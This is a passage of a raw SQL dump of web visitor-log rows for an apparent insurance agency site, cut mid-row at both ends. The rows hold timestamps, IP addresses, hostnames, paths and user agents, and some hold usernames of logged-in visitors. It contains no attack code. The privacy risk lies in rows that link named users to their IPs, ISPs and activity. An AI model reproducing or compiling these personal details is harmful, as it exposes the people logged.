AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(5532,'0b_f7ebdc2c8a6bae8612008e5c0bdf9d61','1458146506','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5534,'0b_f7ebdc2c8a6bae8612008e5c0bdf9d61','1458146508','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5537,'0b_0584b3ef14b239f2c7a32ddb83faaec6','1458146657','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5538,'0b_15ef68d2a89280505622529aff4998ef','1458147086','66.249.83.217,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(5540,'0b_f7ebdc2c8a6bae8612008e5c0bdf9d61','1458147463','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5543,'0b_f7ebdc2c8a6bae8612008e5c0bdf9d61','1458147469','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5544,'0b_f7ebdc2c8a6bae8612008e5c0bdf9d61','1458147477','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5546,'0b_f7ebdc2c8a6bae8612008e5c0bdf9d61','1458147478','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5547,'0b_d355569dd65d422615ba5608ab9c6d17','1458147486','68.180.229.91','b115355.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(5549,'0b_d355569dd65d422615ba5608ab9c6d17','1458147487','68.180.229.91','b115355.yse.yahoo.net','/quotes.htm','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(5550,'0b_90c7369ee4672c5ebfc56e30960e79e5','1458147626','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5553,'0b_90c7369ee4672c5ebfc56e30960e79e5','1458147627','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5556,'0b_0fba367e10b0e194646f363920f204df','1458148457','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(5559,'0b_ceee71dec27ce4153306f8c4e87e2ac1','1458148624','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5562,'0b_0fba367e10b0e194646f363920f204df','1458148640','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(5564,'0b_0fba367e10b0e194646f363920f204df','1458148967','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/forms/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(5565,'0b_0fba367e10b0e194646f363920f204df','1458148973','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(5567,'0b_434dc206d1d86ad060d7cb276bf3c9cb','1458149544','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5570,'0b_434dc206d1d86ad060d7cb276bf3c9cb','1458149544','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5573,'0b_434dc206d1d86ad060d7cb276bf3c9cb','1458149545','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5574,'0b_434dc206d1d86ad060d7cb276bf3c9cb','1458149648','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5577,'0b_434dc206d1d86ad060d7cb276bf3c9cb','1458149660','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(5580,'0b_b6f31bfab550662e60b083106713a5a5','1458150507','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5582,'0b_0d5f91831796629ad456896f0c51d2b0','1458152410','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5585,'0b_82e41e0063b3c0d7e50028dd8b397a32','1458152636','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5588,'0b_82e41e0063b3c0d7e50028dd8b397a32','1458152638','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5591,'0b_0584b3ef14b239f2c7a32ddb83faaec6','1458152915','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5594,'0b_0584b3ef14b239f2c7a32ddb83faaec6','1458152916','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5595,'0b_fd8ea9dda6fd21d61e37e4bd41ca0104','1458153117','185.103.110.52','server-185-103-110-52.creanova.org','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(5598,'0b_efa6005811d53629573a8ac07ad8a354','1458153679','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5600,'0b_efa6005811d53629573a8ac07ad8a354','1458153681','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5601,'0b_51465ecb96af37bbf4c9d8589fe47314','1458154135','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5604,'0b_ffe43e822dee7ea8f3bdb03ab222fb79','1458154140','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(5606,'0b_ffe43e822dee7ea8f3bdb03ab222fb79','1458154147','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(5607,'0b_ffe43e822dee7ea8f3bdb03ab222fb79','1458154151','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(5609,'0b_7e39daeb6289c0e218b82d5f185e9672','1458154253','198.144.151.108','mannerize.tnmail25.pw','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','pw','','','','','','','0','0',0),(5612,'0b_7c85f98e7ed3ab8b0592bec75ed84ed4','1458154532','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5615,'0b_7c85f98e7ed3ab8b0592bec75ed84ed4','1458154535','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(5618,'0b_a761e22a9b50a3f4091d103cb87e4054','1458154687','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5619,'0b_d0c88d25f549e52029b63250c34a237b','1458156181','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5621,'0b_8db928baf6b3f421723eb1d00ca8d0a5','1458157908','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5622,'0b_e72ab1ebc0c41c60bebd1bb2c6b54b46','1458160211','100.43.81.146','spider-100-43-81-146.yandex.com','/resources.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(5624,'0b_ffe43e822dee7ea8f3bdb03ab222fb79','1458160221','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(5625,'0b_ffe43e822dee7ea8f3bdb03ab222fb79','1458160226','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(5628,'0b_ffe43e822dee7ea8f3bdb03ab222fb79','1458160238','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(5631,'0b_ee0e6ef2e1808ca4c1929f2e1190488a','1458160982','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5633,'0b_ee0e6ef2e1808ca4c1929f2e1190488a','1458161059','66.249.73.178','crawl-66-249-73-178.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(5636,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162054','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','0',0),(5639,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162058','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','0',0),(5642,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162078','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/forms/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','0',0),(5643,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162100','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/forms/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5645,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162101','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','0',0),(5646,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162122','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/about-us/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5648,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162122','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5651,'0b_75e3cbbab2a14034fcb50788098ddc72','1458162123','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(5654,'0b_75e3cbbab2a14034fcb50788098ddc72','1458162124','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(5655,'0b_75e3cbbab2a14034fcb50788098ddc72','1458162124','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(5657,'0b_75e3cbbab2a14034fcb50788098ddc72','1458162125','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(5660,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162154','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/forms/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/about-us/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5661,'0b_75e3cbbab2a14034fcb50788098ddc72','1458162165','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(5663,'0b_75e3cbbab2a14034fcb50788098ddc72','1458162166','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 8','us','','','','','','','0','0',0),(5666,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162176','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/?page_id=171?a=pwdreset','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/forms/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5667,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162228','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5670,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162229','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','0',0),(5673,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162236','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','51',0),(5676,'0b_ae71061db39c6ce0d9ed367ca7a0963c','1458162236','99.109.140.72','99-109-140-72.lightspeed.hstntx.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; KFARWI Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Silk/48.2.2 like Chrome/48.0.2564.95 Safari/537.36','http://www.empireins.com/','',0,'Android 5','Silk 48','us','534 x 854','','','','','','0','0',0),(5679,'0b_b4fde1dc8d6dfeb9b5b283620759eb50','1458164610','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5682,'0b_b4fde1dc8d6dfeb9b5b283620759eb50','1458164611','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5684,'0b_7fdd2ecfa34fd166a4f99828d9bcdcaa','1458165246','180.76.15.14','baiduspider-180-76-15-14.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(5685,'0b_701185f59363552e150ff9dfe135553e','1458167638','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5688,'0b_c742801e99b4052549a7a6b8d247cef7','1458168719','5.9.62.130','static.130.62.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5691,'0b_c742801e99b4052549a7a6b8d247cef7','1458168722','5.9.62.130','static.130.62.9.5.clients.your-server.de','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5693,'0b_c742801e99b4052549a7a6b8d247cef7','1458168723','5.9.62.130','static.130.62.9.5.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5696,'0b_c742801e99b4052549a7a6b8d247cef7','1458168725','5.9.62.130','static.130.62.9.5.clients.your-server.de','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5697,'0b_c742801e99b4052549a7a6b8d247cef7','1458168728','5.9.62.130','static.130.62.9.5.clients.your-server.de','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(5700,'0b_1e610baa26ce05069c8df168a5afebbe','1458168946','54.200.13.176','ec2-54-200-13-176.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5703,'0b_1e610baa26ce05069c8df168a5afebbe','1458168962','54.200.13.176','ec2-54-200-13-176.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5705,'0b_b6ec20f6f261cd65687dff694c8c8a66','1458169579','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(5706,'0b_b6ec20f6f261cd65687dff694c8c8a66','1458169590','69.30.213.202','69.30.213.202','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(5708,'0b_b6ec20f6f261cd65687dff694c8c8a66','1458169601','69.30.213.202','69.30.213.202','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(5711,'0b_cf6b8582aa405794f256d789eeebcffe','1458172018','23.239.224.1','23.239.224.1','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','','',0,'Win10 x64','Firefox 44','us','','','','','','','0','0',0),(5714,'0b_cf6b8582aa405794f256d789eeebcffe','1458172038','23.239.224.1','23.239.224.1','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/','',0,'Win10 x64','Firefox 44','us','','','','','','','0','0',0),(5715,'0b_73b2b4c0c77d2f4de22a30f1869c8ba6','1458172794','151.80.44.115','mj5.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(5717,'0b_73b2b4c0c77d2f4de22a30f1869c8ba6','1458172797','151.80.44.115','mj5.naefmarco.ch','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(5720,'0b_054424ebbd21e6e3e583b44c47853507','1458172806','151.80.44.115','mj5.naefmarco.ch','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 